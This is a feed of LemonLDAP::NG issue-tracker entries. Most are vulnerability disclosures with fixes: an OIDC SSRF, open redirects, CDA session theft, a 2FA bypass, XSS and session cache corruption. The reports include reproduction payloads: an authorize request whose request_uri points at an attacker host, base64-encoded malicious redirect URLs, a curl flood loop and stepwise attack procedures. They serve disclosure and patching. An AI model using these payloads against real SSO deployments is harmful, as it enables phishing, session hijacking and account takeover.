# lemonldap-ng issues
Feed: https://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues | Updated: 2023-10-10T15:11:24Z

## Add value filtering to 2F::Register::Generic
Issue: https://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues/2993 | Updated: 2023-10-10T15:11:24Z | Author: Maxime Besson
### Summary
Currently, it's not possible to force generic registrable 2F (email, sms, etc..) to follow a syntax rule (valid phone number, etc).
### Design proposition
* We need to implement a regex check for registrable info, and check it on the server side
* The error message needs to be customizable
* An invalid value should not be fatal (cancel the whole registration process)
* Optionally, also implement a JS check?

Milestone: 2.18.0 | Assignee: Maxime Besson

## Implement continuations in the portal login flow
Issue: https://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues/3000 | Updated: 2023-10-10T13:31:15Z | Author: Maxime Besson
### Summary
The LemonLDAP::NG portal is centered around the idea of running a list of methods (with `do`) in order.
(extractFormInfo, getUser, etc)
But this flow generally needs to be interrupted at some point for user interaction:
* Entering credentials
* Entering 2FA
* Showing notifications
* Showing info
* etc.
Each component of LemonLDAP::NG has its own way of doing that. Generally a OneTimeToken is used, but not always.
* Issuer saves the request environment
* 2FA saves sessionInfo + a couple other fields
* Notifications encrypt the session cookie but require $req->data->{url} to be persisted
* etc.
There are literally dozens of bugs, maybe more, caused by the fact that the
current `$req` object needs to be serialized before the interaction and
restored after, and this is done incorrectly.
There are many bugs caused by interactions that arise from the fact that some
early part of the processing sets something in `$req->data` that is needed
later, but is not restored correctly.
There are also many bugs caused by the fact that some extra steps are stored in
`$req->steps` but not restored after an interaction.
### Design proposition
We need to create a generic system for storing the request state during a user
interaction, including `$req->steps`. This system should be used by every part
of LemonLDAP::NG that needs to interrupt the current flow to display a page.
I will update this issue with a design proposal later, but it will take a lot
of time to implement this correctly, and require many preliminary steps.

Assignee: Maxime Besson

## [Security][CVE-2023-28862] AuthBasic does not handle failure correctly
Issue: https://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues/2896 | Updated: 2023-10-08T16:40:55Z | Author: Maxime Besson
### Concerned version
Version: 2.0.16
### Summary
The AuthBasic handler works like this:
* It computes a sessionid from login+password
* If sessionid already exists in the session DB, authenticate user
* Else, try to create the corresponding session by sending the login+pass to the portal RESTServer plugin
However, the only required step in the login flow is `store`: if anything happens after the `store` step, AuthBasic will succeed because the fixed-id session has been successfully created, which means:
* Accounts that are supposed to be 2FA-protected are not 2FA protected when AuthBasic is used
* If a 2FA module returns an error, the *first* AuthBasic request will 401, but the *second* AuthBasic request will work correctly => *VERY CONFUSING*
* Any plugin that tries to deny session *after* the `store` step will not deny AuthBasic sessions
This is probably a security issue
### Possible fixes
If the AuthBasic login process fails (not PE_OK), we need to remove the session created by `store` and return an error.
This will cause a regression: users who relied on AuthBasic working for 2FA-protected accounts will now see failures.
Possible solution: use an env variable in 2FA activation rules if desired:
```perl
has2f("TOTP") and not $env->{"AuthBasic"}
```
or something of that sort.

Milestone: 2.16.1 | Assignee: Maxime Besson

## [CVE-2020-16093] Peer certificate not checked when using LDAPS
Issue: https://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues/2250 | Updated: 2023-10-08T16:40:55Z | Author: Maxime Besson
### Environment
LemonLDAP::NG version: 2.0.8
Operating system: Debian 10
### Summary
* Configure a `ldaps://` URL as `ldapServer`
* Setup a self signed certificate on the LDAP server
* It works
* (It should not work.)
### Possible fixes
Net::LDAP is insecure by default, at least on Debian Buster. We should explicitly pass `verify => require` when initializing it.
Fixing this is probably going to break a lot of installs. We need to create a new option for this and add a warning to the release notes.

Milestone: 2.0.9 | Assignee: Maxime Besson

## Provide all application information through REST service GET /myapplications
Issue: https://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues/2970 | Updated: 2023-10-02T14:26:58Z | Author: Clément OUDOT
We should add the tooltip and icon/SVG icon in the REST service which returns the application list.
Linked to https://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues/2853

Milestone: 2.17.0 | Assignee: Clément OUDOT

## [Security:low][CVE-2023-44469] SSRF vulnerability in OIDC SSO
Issue: https://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues/2998 | Updated: 2023-09-29T08:40:43Z | Author: Mike Lorang
### Affected version
Version: lemonldap-ng 2.16.2-1
Platform: Apache
### Summary
The vulnerability is very similar to other implementations of OIDC.
The SSRF occurs when changing the request_uri parameter in the URL.
Here is a blog post describing similar issues in other implementations:
https://security.lauritz-holtmann.de/post/sso-security-ssrf/
### Details
Here is the GET request in detail:
```http
GET /oauth2/authorize?client_id=<redacted>&nonce=<redacted>&redirect_uri=<redacted>&response_type=code&scope=openid%20profile%20email&state=<redacted>&request_uri=https://attacker_url.com/requesturi.jwt HTTP/1.1
Host: auth.sso.domain.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://gitlab.int.govcert.etat.lu/
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-site
Sec-Fetch-User: ?1
Authorization: Negotiate
<some base64 redacted>
Cookie: lemonldappdata=<redacted>
```
A request containing the parameter request_uri set to an arbitrary URL value, https://attacker_url.com/requesturi.jwt, was sent to the OpenID Authorization Server. As a consequence the OpenID Provider interacts with the remote attacker server listening on the specified URL, demonstrating that it is vulnerable to blind SSRF issues.
### Possible fixes
For security reasons the URI value of the request_uri parameter should be carefully validated server-side, otherwise an attacker could lead the OpenID Provider to interact with an arbitrary server under their control and then potentially exploit SSRF vulnerabilities. It is advisable to define a strict whitelist of allowed URI values (pre-registered during the OpenID client registration process) for the request_uri parameter.

Milestone: 2.17.1 | Assignee: Maxime Besson

## [Security:low] Open redirection when OIDC RP isn't configured with redirection uri
Issue: https://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues/3003 | Updated: 2023-09-25T14:46:11Z | Author: Yadd
This can't happen if the configuration was modified using the manager _(a test filters this case)_.
The issue is: if this misconfiguration exists, LLNG follows the redirection given in the redirect_uri parameter.

Milestone: 2.17.1 | Assignee: Yadd

## Conf::LDAP options in lemonldap-ng.ini overrides Auth options in portal
Issue: https://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues/3001 | Updated: 2023-09-25T09:57:06Z | Author: Maxime Besson
### Affected version
Version: 2.17.0
### Summary
* Define a LDAP server for configuration storage
* Use a different LDAP server (AD) for Auth
* Auth is performed against the configuration LDAP server :x:
### Logs
```
[debug] Processing getUser
[debug] Try to build new LDAP connection with: ldap://ldap-config
[error] Error when binding to LDAP server: Invalid credentials
```
### Possible fixes
This is a regression caused by be157d5de17116d9bdcd25462676d399d9bf0559
We should roll back the fixes for #2711 and try to find a better solution.
I think this issue might affect a decent number of users, so a 2.17.1 may be justified.

Milestone: 2.17.1 | Assignee: Maxime Besson

## [Security:medium] Redirection URL validation bypass using credentials in URL
Issue: https://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues/2832 | Updated: 2023-09-22T14:13:30Z | Author: Clément OUDOT
An attacker can forge a redirection to a malicious site using a fake credentials-in-URL value.
Example:
* Portal : https://auth.openid.club
* Allowed application : https://test1.openid.club
* Malicious site : https://google.fr
* Malicious URL : https://test1.openid.club:test@google.fr
* Malicious URL base 64 : aHR0cHM6Ly90ZXN0MS5vcGVuaWQuY2x1Yjp0ZXN0QGdvb2dsZS5mcgo=
* Malicious redirection trigger : https://auth.openid.club/?url=aHR0cHM6Ly90ZXN0MS5vcGVuaWQuY2x1Yjp0ZXN0QGdvb2dsZS5mcgo=

Milestone: 2.0.16 | Assignee: Maxime Besson

## [Security:medium] open redirection due to incorrect escape handling in URI userinfo
Issue: https://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues/2931 | Updated: 2023-09-22T14:13:30Z | Author: Maxime Besson
### Concerned version
Version: 2.16.2
### Summary
* Browse to http://auth.example.com/?url=aHR0cHM6Ly9oYWNrZXIuY29tXEBAdGVzdDEuZXhhbXBsZS5jb20v (https://hacker.com\@@test1.example.com/)
* LLNG detects it as test1.example.com, which is allowed, and sends redirect
* For some reason, browsers "correct" it to https://hacker.com/@@test1.example.com/
### Possible fixes
We should normalize the received URL before using it in redirects:
```perl
my $u = URI->new('https://hacker.com\@@test1.example.com/');
print $u; # https://hacker.com%5C@@test1.example.com
```

Milestone: 2.17.0 | Assignee: Maxime Besson

## [security:low] Incorrect regexp construction in isTrustedUrl lets attacker steal session on CDA application
Issue: https://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues/2535 | Updated: 2023-09-22T14:13:29Z | Author: Maxime Besson
### Concerned version
Version: 2.0.11
### Summary
* Configure a CDA vhost (cda.example.com)
* let attack_urldc = base64(http://your-untrusted-domain.com/?attack=http://cda.example.com)
* Trick your target into opening http://auth.lemontest.lxd/?url=attack_url
* User is redirected to http://your-untrusted-domain.com/?attack=http://cda.example.com&lemonldapcda=CDA_CODE
* You may now log in to http://cda.example.com?lemonldapcda=CDA_CODE as the target user
Example:
http://auth.example.com/?url=aHR0cDovL3BlcmR1LmNvbS8/ZmFrZT1odHRwOi8vY2RhLmV4YW1wbGUuY29tLw==
### Possible fixes
The trustedDomainsRe is missing a `^`; this is also the case in !185.
This mistake causes trustedDomainsRe to be easily bypassed, but CDA is the feature with the worst impact for this mistake.

Milestone: 2.0.12 | Assignee: Maxime Besson

## Plugin checkState, combination and Kerberos
Issue: https://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues/2611 | Updated: 2023-09-22T14:13:29Z | Author: Clément OUDOT
Trying to use the checkstate plugin (https://lemonldap-ng.org/documentation/latest/checkstate.html) with a setup using a Kerberos/LDAP combination.
Using a bad username works (the check fails) but a valid username and a bad password works.
Logs just say authentication is valid:
```
[Thu Sep 9 17:25:08 2021] [LLNG:60228] [debug] Check configuration for Lemonldap::NG::Handler::PSGI::Main
[Thu Sep 9 17:25:08 2021] [LLNG:60228] [debug] Get configuration from cache without verification.
[Thu Sep 9 17:25:08 2021] [LLNG:60228] [debug] Lemonldap::NG::Handler::PSGI::Main: configuration is up to date
[Thu Sep 9 17:25:08 2021] [LLNG:60228] [info] No cookie found
[Thu Sep 9 17:25:08 2021] [LLNG:60228] [debug] Build URL https://auth.example.com/checkstate?secret=secret&user=coudot&password=test
[Thu Sep 9 17:25:08 2021] [LLNG:60228] [debug] Redirect 1.1.1.1 to portal (url was /checkstate?secret=secret&user=coudot&password=test)
[Thu Sep 9 17:25:08 2021] [LLNG:60228] [debug] User not authenticated, Try in use, cancel redirection
[Thu Sep 9 17:25:08 2021] [LLNG:60228] [debug] Start routing checkstate
[Thu Sep 9 17:25:08 2021] [LLNG:60228] [debug] Processing controlUrl
[Thu Sep 9 17:25:08 2021] [LLNG:60228] [debug] Processing code ref
[Thu Sep 9 17:25:08 2021] [LLNG:60228] [debug] Processing code ref
[Thu Sep 9 17:25:08 2021] [LLNG:60228] [debug] Launching ::Issuer::SAML::storeEnv
[Thu Sep 9 17:25:08 2021] [LLNG:60228] [debug] Processing getUser
[Thu Sep 9 17:25:08 2021] [LLNG:60228] [debug] Processing authenticate
[Thu Sep 9 17:25:08 2021] [LLNG:60228] [debug] -> authResult = 0
```
But no Kerberos ticket is sent here.

Milestone: In discussion | Assignee: Clément OUDOT

## [security:high, CVE-2021-35472] session cache corruption can lead to authorization bypass or spoofing
Issue: https://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues/2539 | Updated: 2023-09-22T14:13:29Z | Author: Christophe Maudoux <chrmdx@gmail.com>
### Concerned version
Version: %2.0.0 to %2.0.11
Platform: Nginx/uWSGI
### Summary
- Enable Impersonation plugin
- Enable REST Session server
- Disable CSRF tokens
- Start a terminal and execute: `for i in {1..1000}; do curl -X POST -H 'Accept:application/json' -d user=msmith --data-urlencode password='msmith' http://auth.example.com:19876;done`
- make reload
- Login dwho/dwho/dwho and hit F5 to refresh Portal
- Alternatively authenticated as 'dwho' or 'msmith'
### Backends used
PG

![vokoscreen-2021-06-08_22-12-00](/uploads/0f9e1505bbbf02384be054e46f27c941/vokoscreen-2021-06-08_22-12-00.mp4)
### Possible fixes
The issue seems to be linked to the handler's internal cache.
Login with 'dwho' / 'dwho'
Enable Impersonation plugin -> make reload_web_server
Start bash loop, hit F5 and session switches to 'msmith'
Stop the bash loop and the session is back to 'dwho' after 10/15 seconds.

Milestone: 2.0.12 | Assignee: Yadd

## [security:low] 2FA bypass with sfOnlyUpgrade and totp2fDisplayExistingSecret
Issue: https://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues/2543 | Updated: 2023-09-22T14:13:29Z | Author: Maxime Besson
### Concerned version
Version: 2.0.11
### Summary
* Configure "Use 2FA for session upgrade"
* Configure TOTP with "Display existing secret" enabled
* Steal a user's password and login with it
* Go to 2FA manager, click TOTP
* Scan the user's existing TOTP to your own device, and profit.
on backends
### Possible fixes
Either
* Remove the ability to display existing 2FA secrets
Or
* Protect existing secret from being displayed when current authentication level is too low
Depending on #2541

Milestone: 2.0.12 | Assignee: Maxime Besson

## [security:low] Wildcard in virtualhost allows being redirected to untrusted domains
Issue: https://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues/2477 | Updated: 2023-09-22T14:13:29Z | Author: Andreas Deschka
One of our users has reported to us the following security problem, which could be used for phishing.
In Lemonldap 2.0.10, when you create a virtual host with a wildcard, for example `*.subdomain.local.test`, an attacker can forward users to any domain by using specially designed URLs.
Target url: `https://google.com#abc.subdomain.local.test/` (The slash at the end is important.)
Base64 encoded: `aHR0cHM6Ly9nb29nbGUuY29tI2FiYy5zdWJkb21haW4ubG9jYWwudGVzdC8=`
Url which the user clicks on (looks like it is safe to use): `https://myportal.local.test/url=aHR0cHM6Ly9nb29nbGUuY29tI2FiYy5zdWJkb21haW4ubG9jYWwudGVzdC8=`
User will now get redirected to `https://google.com#abc.subdomain.local.test`
I checked if CDA is also affected, but from what I saw, it seems not to be. (We do not have it activated anyway.) The following line always rejects correctly:
https://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/blob/v2.0/lemonldap-ng-portal/lib/Lemonldap/NG/Portal/Plugins/CDA.pm#L29
I have no problem with publishing this issue, if you do not have anything against it.
I used Chrome version 88.0.4324.192 for testing.

Milestone: 2.0.12 | Assignee: Yadd

## [security:medium] XSS on register form
Issue: https://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues/2495 | Updated: 2023-09-22T14:13:29Z | Author: Clément OUDOT
In the register form, we do not check for XSS before storing the data into the session:
```perl
# Use submitted value
$req->data->{registerInfo}->{mail} = $req->param('mail');
$req->data->{registerInfo}->{firstname} = $req->param('firstname');
$req->data->{registerInfo}->{lastname} = $req->param('lastname');
$req->data->{registerInfo}->{ipAddr} = $req->address;
```
This allows injecting HTML code into the form, which will be displayed in the mail sent to the end user and can lead to malicious content (redirection to a hacker's site).
We should check for XSS before registering data, for example:
```perl
# Check input
if (   $self->p->checkXSSAttack( 'mail',      $req->param('mail') )
    or $self->p->checkXSSAttack( 'firstname', $req->param('firstname') )
    or $self->p->checkXSSAttack( 'lastname',  $req->param('lastname') ) )
{
    $self->logger->error("XSS on Register form");
    return PE_MALFORMEDUSER;
}
# Use submitted value
$req->data->{registerInfo}->{mail} = $req->param('mail');
$req->data->{registerInfo}->{firstname} = $req->param('firstname');
$req->data->{registerInfo}->{lastname} = $req->param('lastname');
$req->data->{registerInfo}->{ipAddr} = $req->address;
```
A review of all public forms should be done to check that we have no other issues.

Milestone: 2.0.12 | Assignee: Clément OUDOT

## userControl regexp is not applied by authSlave
Issue: https://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues/2946 | Updated: 2023-09-22T13:59:59Z | Author: Christophe Maudoux <chrmdx@gmail.com>
### Affected version
Version: All
Platform: All
The Slave authentication module can submit an invalid login.

Milestone: 2.17.0 | Assignee: Christophe Maudoux <chrmdx@gmail.com>

## oidcServiceAllowOnlyDeclaredScopes option drops offline_access scope
Issue: https://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues/3010 | Updated: 2023-09-20T09:26:16Z | Author: Yadd

Milestone: 2.17.1

## Cannot override configuration in lemonldap-ng.ini when value is "0"
Issue: https://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues/2711 | Updated: 2023-09-20T09:03:18Z | Author: Maxime Besson
### Concerned version
Version: 2.0.14
### Summary
* In config, set `portalDisplayRegister=1`
* In lemonldap-ng.ini, set `portalDisplayRegister=0`
* Expected: Register button is not displayed
* Actual: Register button is displayed
### Logs
In portal `reloadConf`:
* `$conf` is configuration from backend
```perl
%{ $self->{conf} } = %{ $self->localConfig };
...
# Load conf in portal object
foreach my $key ( keys %$conf ) {
    $self->{conf}->{$key} ||= $conf->{$key};
}
```
### Possible fixes
* `||=` should probably be `//=`
* Side effects?
* Perhaps localConf should be loaded into `$self->{conf}` after `$conf`?
* Does this happen elsewhere?

Milestone: 2.17.0 | Assignee: Maxime Besson

## Invalid URL for application logo in myapplications web service
Issue: https://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues/2996 | Updated: 2023-09-15T13:46:19Z | Author: Clément OUDOT
The logo URL returned by /myapplications is malformed: `http:/auth.example.com//static/common/apps/demo.png`. There is a missing `/` after `http:`.
The bug was introduced in commit 6fde3a06502c0fb13375830e5e9b0ebb21c6692b
The associated unit test is wrong, as it tests the malformed value:
```perl
ok(
    $res->{myapplications}->[0]->{Applications}->[0]->{'Application Test 1'}
      ->{AppLogo} eq 'http:/auth.example.com//static/common/apps/demo.png',
    ' Logo app1 found'
);
```
Commenting out the last regexp on basePath is enough to fix the problem:
```diff
diff --git a/lemonldap-ng-portal/lib/Lemonldap/NG/Portal/Plugins/RESTServer.pm b/lemonldap-ng-portal/lib/Lemonldap/NG/Portal/Plugins/RESTServer.pm
index f5b760e1c..cb8b88155 100644
--- a/lemonldap-ng-portal/lib/Lemonldap/NG/Portal/Plugins/RESTServer.pm
+++ b/lemonldap-ng-portal/lib/Lemonldap/NG/Portal/Plugins/RESTServer.pm
@@ -788,7 +788,7 @@ sub myApplications {
my $basePath = $self->conf->{portal};
$basePath =~ s#/*$#/#;
$basePath .= $self->p->{staticPrefix} . '/common/apps/';
- $basePath =~ s#//+#/#;
+ #$basePath =~ s#//+#/#;
my @appslist = map {
my @apps = map {
{
```
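Review bot: commenting out `$basePath =~ s#//+#/#;` stops the scheme mangling but also stops collapsing the real duplicate: `s#/*$#/#` guarantees a trailing `/` on `$basePath`, and the reported URL shows `staticPrefix` starting with `/`, so the result now becomes `http://auth.example.com//static/common/apps/`. The original line only damaged the scheme because it has no `/g` flag, so its single match is the `//` of `http://`. Suggest keeping a collapse restricted to the path, e.g. `$basePath =~ s#(?<!:)/{2,}#/#g;`, and updating the unit test that currently asserts the malformed `http:/auth.example.com//static/...` value.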
A better solution might be found.

Milestone: 2.17.1 | Assignee: Clément OUDOT
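As an added illustration, not code from the LemonLDAP::NG project: the script below reproduces the `s#//+#/#` behaviour described in this issue and shows one possible better solution, collapsing duplicate slashes only in the path component via URI. The portal URLs and the `/static` prefix are constructed sample values.

```perl
#!/usr/bin/perl
use strict;
use warnings;
use URI;

# Added example, not LemonLDAP::NG code. Reproduces the basePath bug reported
# above and shows a variant that only touches the path component of the URL.

# Same statements as the buggy RESTServer.pm code: the substitution has no /g
# flag, so its first (and only) match is the "//" of "http://".
sub base_path_buggy {
    my ( $portal, $static_prefix ) = @_;
    my $basePath = $portal;
    $basePath =~ s#/*$#/#;                    # exactly one trailing slash
    $basePath .= $static_prefix . '/common/apps/';
    $basePath =~ s#//+#/#;                    # eats the scheme's "//"
    return $basePath;
}

# Parse the portal URL, build the path separately, collapse repeated slashes
# there only, and let URI reassemble scheme://host/path.
sub base_path_fixed {
    my ( $portal, $static_prefix ) = @_;
    my $u    = URI->new($portal);
    my $path = join '/', $u->path, $static_prefix, 'common', 'apps', '';
    $path =~ s#/{2,}#/#g;                     # "//static" -> "/static"
    $path = "/$path" unless $path =~ m#^/#;   # keep it absolute
    $u->path($path);
    return $u->as_string;
}

# Constructed sample inputs: portal URLs with and without a trailing slash or
# sub-path, and a staticPrefix that starts with "/" (as in the report).
for my $portal (
    'http://auth.example.com',
    'http://auth.example.com/',
    'https://auth.example.com/sso/',
    )
{
    printf "%-32s buggy: %s\n", $portal, base_path_buggy( $portal, '/static' );
    printf "%-32s fixed: %s\n", $portal, base_path_fixed( $portal, '/static' );
}
```

For the first input the buggy variant yields the exact `http:/auth.example.com//static/common/apps/` prefix from the report, while the fixed variant yields `http://auth.example.com/static/common/apps/`.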